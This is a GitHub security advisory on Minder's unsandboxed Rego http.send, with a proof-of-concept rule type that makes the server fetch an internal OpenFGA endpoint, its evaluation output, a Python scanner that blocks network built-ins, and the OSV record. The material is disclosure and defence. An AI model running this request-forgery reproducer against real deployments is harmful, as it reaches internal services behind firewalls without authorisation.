GHSA-6xvf-4vh9-mw47
Vulnerability from github
Published
2025-11-20 21:57
Modified
2025-11-20 21:57
Summary
Minder does not sandbox http.send in Rego programs
Details

Impact

Minder users may fetch content in the context of the Minder server, including URLs the user would not normally be able to reach (for example, when the Minder server sits behind a firewall or other network partition).

Patches

https://github.com/mindersec/minder/commit/f770400923984649a287d7215410ef108e845af8

Workarounds

Users should avoid deploying Minder with access to sensitive resources. Unfortunately, this could include access to systems like OpenFGA or Keycloak, depending on the deployment configuration.

References

Sample ruletype:

```yaml
version: v1
type: rule-type
name: test-http-send
display_name: Test that we can call http.send
short_failure_message: Failed http.send
severity:
  value: medium
context:
  provider: github
description: |
  ...
guidance: |
  ....
def:
  in_entity: repository
  rule_schema:
    type: object
    properties: {}
  ingest:
    type: git
    git: {}
  eval:
    type: rego
    violation_format: text
    rego:
      type: constraints
      def: |
        package minder

        import rego.v1

        violations contains {"msg": "Check-execution"}

        resp := http.send({
          "method": "GET",
          "url": "http://openfga:8080/",
          "raise_error": false,
        })

        violations contains {"msg": sprintf("Response: %s", [resp.status])}

        details := sprintf("High score: %s", [resp.body.summary])

        violations contains {"msg": sprintf("Response body: %s", [resp.body]) } if {
          resp.status_code > 0
        }
```

Example policy:

```yaml
version: v1
type: profile
name: Test-HTTP-send
display_name: Test if we can do http.send
context:
  provider: github
alert: "off"
remediate: "off"
repository:
  - type: test-http-send
    def: {}
```

Evaluation results:

```sh
$ minder profile status list -n test-http-send --json
{
  "profileStatus": {
    "profileId": "3b3e0918-4deb-49cc-b4c9-1d1d912cf784",
    "profileName": "Test-HTTP-send",
    "profileStatus": "failure",
    "lastUpdated": "2024-10-31T03:44:01.456359Z"
  },
  "ruleEvaluationStatus": [
    {
      "profileId": "3b3e0918-4deb-49cc-b4c9-1d1d912cf784",
      "ruleId": "c0ebac2c-cfe2-4a98-b0a6-d6971209653e",
      "ruleName": "test-http-send",
      "entity": "repository",
      "status": "failure",
      "lastUpdated": "2024-10-31T03:44:01.456359Z",
      "entityInfo": {
        "entity_id": "a7f7a4bc-4430-4e9a-86a9-ffa026db6343",
        "entity_type": "repository",
        "name": "a-random-sandbox/colorls",
        "provider": "github-app-a-random-sandbox",
        "repo_name": "colorls",
        "repo_owner": "a-random-sandbox",
        "repository_id": "a7f7a4bc-4430-4e9a-86a9-ffa026db6343"
      },
      "details": "Multiple issues:\n* Check-execution\n* Response body: {\"code\": \"undefined_endpoint\", \"message\": \"Not Found\"}\n* Response: 404 Not Found\n",
      "guidance": "....\n",
      "remediationStatus": "skipped",
      "remediationLastUpdated": "2024-10-31T03:44:01.456359Z",
      "ruleTypeName": "test-http-send",
      "ruleDescriptionName": "Test that we can call http.send",
      "alert": {
        "status": "skipped",
        "lastUpdated": "2024-10-31T03:44:01.456359Z"
      },
      "ruleDisplayName": "Test that we can call http.send",
      "releasePhase": "RULE_TYPE_RELEASE_PHASE_ALPHA"
    }
  ]
}
```
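The sample rule type above reaches an internal service (openfga:8080) only because the Rego evaluator runs with the Minder server's own network reach. For a deployment that cannot take the linked fix immediately, one compensating control is an admission-time check that refuses rule types whose Rego calls network-reaching OPA built-ins. The Python below is an added example written for this page, not Minder's code (Minder's actual fix is the linked commit); the function names, the deny list in NETWORK_BUILTINS, and the assumption that the caller has already extracted the `eval.rego.def` string from the rule-type YAML are all assumptions of this example. The three Rego inputs are constructed here; the first is the advisory's reproducer.

```python
"""Admission-time check for Minder rule types: refuse Rego that calls
network-reaching OPA built-ins.

Added example for this advisory, not Minder's own code. Assumptions: the
caller has already pulled the ``eval.rego.def`` string out of the rule-type
YAML, and NETWORK_BUILTINS is the deployer's own deny list.
"""
import re
from dataclasses import dataclass

# OPA built-ins that open a connection from the evaluating process.
# (Assumption: this is the set a deployer chooses to forbid.)
NETWORK_BUILTINS = frozenset({"http.send", "net.lookup_ip_addr"})

# A dotted reference followed by "(": the shape of a built-in call.
# The lookbehind stops "data.http.send(" from matching as "http.send".
_DOTTED_CALL = re.compile(r"(?<![\w.])([A-Za-z_]\w*(?:\.[A-Za-z_]\w*)+)\s*\(")


@dataclass(frozen=True)
class Finding:
    line: int      # 1-based line in the Rego source
    builtin: str   # which forbidden built-in was called
    source: str    # the offending source line, stripped


def mask_rego(src: str) -> str:
    """Blank out comments and string literals, keeping newlines so that line
    numbers in the masked text line up with the original."""
    out = []
    i, n = 0, len(src)
    while i < n:
        c = src[i]
        if c == "#":                      # comment runs to end of line
            while i < n and src[i] != "\n":
                i += 1
            continue
        if c == '"':                      # interpreted string, honours \" escapes
            i += 1
            while i < n and src[i] != '"':
                i += 2 if src[i] == "\\" else 1
            i += 1
            out.append(" ")
            continue
        if c == "`":                      # raw string, may span several lines
            i += 1
            while i < n and src[i] != "`":
                out.append("\n" if src[i] == "\n" else " ")
                i += 1
            i += 1
            continue
        out.append(c)
        i += 1
    return "".join(out)


def find_network_builtins(rego_src: str) -> list[Finding]:
    """Return every call to a forbidden built-in, with its line number."""
    original_lines = rego_src.splitlines()
    findings = []
    for lineno, line in enumerate(mask_rego(rego_src).splitlines(), start=1):
        for match in _DOTTED_CALL.finditer(line):
            name = match.group(1)
            if name in NETWORK_BUILTINS:
                findings.append(Finding(lineno, name, original_lines[lineno - 1].strip()))
    return findings


def rule_type_is_admissible(rego_src: str) -> bool:
    """Registration gate: True only if no network built-in is called."""
    return not find_network_builtins(rego_src)


# Constructed inputs. SAMPLE_REGO is the advisory's reproducer (trimmed);
# the other two are written here to exercise the masking.
SAMPLE_REGO = """\
package minder

import rego.v1

violations contains {"msg": "Check-execution"}

resp := http.send({
  "method": "GET",
  "url": "http://openfga:8080/",
  "raise_error": false,
})

violations contains {"msg": sprintf("Response: %s", [resp.status])}
"""

BENIGN_REGO = """\
package minder

import rego.v1

# http.send(...) is deliberately not called in this rule type
violations contains {"msg": "do not call http.send(x) from rules"} if {
  count(input.commits) == 0
}
"""

RAW_STRING_REGO = """\
package minder

note := `
http.send({"url": "http://openfga:8080/"}) appears only in this raw string
`

ip := net.lookup_ip_addr("openfga")
"""

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_REGO), ("benign", BENIGN_REGO), ("raw", RAW_STRING_REGO)):
        verdict = "admitted" if rule_type_is_admissible(src) else "rejected"
        print(f"{label}: {verdict}")
        for f in find_network_builtins(src):
            print(f"  line {f.line}: {f.builtin} -> {f.source}")
```

The scanner masks comments and string literals before matching, so a rule type that merely mentions `http.send` in a message or comment is not rejected, while a call hidden after a multi-line raw string is still reported on the right line. It is deliberately conservative in the other direction: a dotted call whose name collides with a forbidden built-in is flagged even if it were to resolve to an imported package, which is the safe failure direction for a gate. This is a stopgap, not a substitute for the upstream fix; the durable control is the evaluator itself restricting which built-ins and hosts a policy may use.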



{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.0.83"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mindersec/minder"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.0.72"
            },
            {
              "fixed": "0.0.84"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-830"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-20T21:57:01Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Impact\n\nMinder users may fetch content in the context of the Minder server, which may include URLs which the user would not normally have access to (for example, if the Minder server is behind a firewall or other network partition).\n\n### Patches\n\nhttps://github.com/mindersec/minder/commit/f770400923984649a287d7215410ef108e845af8\n\n### Workarounds\n\nUsers should avoid deploying Minder with access to sensitive resources.  Unfortunately, this could include access to systems like OpenFGA or Keycloak, depending on the deployment configuration.\n\n### References\n\nSample ruletype:\n\n```yaml\nversion: v1\ntype: rule-type\nname: test-http-send\ndisplay_name: Test that we can call http.send\nshort_failure_message: Failed http.send\nseverity:\n  value: medium\ncontext:\n  provider: github\ndescription: |\n  ...\nguidance: |\n  ....\ndef:\n  in_entity: repository\n  rule_schema:\n    type: object\n    properties: {}\n  ingest:\n    type: git\n    git: {}\n  eval:\n    type: rego\n    violation_format: text\n    rego:\n      type: constraints\n      def: |\n        package minder\n\n        import rego.v1\n\n        violations contains {\"msg\": \"Check-execution\"}\n\n        resp := http.send({\n          \"method\": \"GET\",\n          \"url\": \"http://openfga:8080/\",\n          \"raise_error\": false,\n        })\n\n        violations contains {\"msg\": sprintf(\"Response: %s\", [resp.status])}\n\n        details := sprintf(\"High score: %s\", [resp.body.summary])\n\n        violations contains {\"msg\": sprintf(\"Response body: %s\", [resp.body]) } if {\n          resp.status_code \u003e 0\n        }\n```\n\nExample policy:\n\n```yaml\nversion: v1\ntype: profile\nname: Test-HTTP-send\ndisplay_name: Test if we can do http.send\ncontext:\n  provider: github\nalert: \"off\"\nremediate: \"off\"\nrepository:\n  - type: test-http-send\n    def: {}\n```\n\nEvaluation results:\n\n```sh\n$ minder profile status list -n test-http-send --json\n{\n  \"profileStatus\": {\n    \"profileId\": \"3b3e0918-4deb-49cc-b4c9-1d1d912cf784\",\n    \"profileName\": \"Test-HTTP-send\",\n    \"profileStatus\": \"failure\",\n    \"lastUpdated\": \"2024-10-31T03:44:01.456359Z\"\n  },\n  \"ruleEvaluationStatus\": [\n    {\n      \"profileId\": \"3b3e0918-4deb-49cc-b4c9-1d1d912cf784\",\n      \"ruleId\": \"c0ebac2c-cfe2-4a98-b0a6-d6971209653e\",\n      \"ruleName\": \"test-http-send\",\n      \"entity\": \"repository\",\n      \"status\": \"failure\",\n      \"lastUpdated\": \"2024-10-31T03:44:01.456359Z\",\n      \"entityInfo\": {\n        \"entity_id\": \"a7f7a4bc-4430-4e9a-86a9-ffa026db6343\",\n        \"entity_type\": \"repository\",\n        \"name\": \"a-random-sandbox/colorls\",\n        \"provider\": \"github-app-a-random-sandbox\",\n        \"repo_name\": \"colorls\",\n        \"repo_owner\": \"a-random-sandbox\",\n        \"repository_id\": \"a7f7a4bc-4430-4e9a-86a9-ffa026db6343\"\n      },\n      \"details\": \"Multiple issues:\\n* Check-execution\\n* Response body: {\\\"code\\\": \\\"undefined_endpoint\\\", \\\"message\\\": \\\"Not Found\\\"}\\n* Response: 404 Not Found\\n\",\n      \"guidance\": \"....\\n\",\n      \"remediationStatus\": \"skipped\",\n      \"remediationLastUpdated\": \"2024-10-31T03:44:01.456359Z\",\n      \"ruleTypeName\": \"test-http-send\",\n      \"ruleDescriptionName\": \"Test that we can call http.send\",\n      \"alert\": {\n        \"status\": \"skipped\",\n        \"lastUpdated\": \"2024-10-31T03:44:01.456359Z\"\n      },\n      \"ruleDisplayName\": \"Test that we can call http.send\",\n      \"releasePhase\": \"RULE_TYPE_RELEASE_PHASE_ALPHA\"\n    }\n  ]\n}\n```",
  "id": "GHSA-6xvf-4vh9-mw47",
  "modified": "2025-11-20T21:57:01Z",
  "published": "2025-11-20T21:57:01Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mindersec/minder/security/advisories/GHSA-6xvf-4vh9-mw47"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mindersec/minder/commit/f770400923984649a287d7215410ef108e845af8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mindersec/minder"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Minder does not sandbox http.send in Rego programs"
}

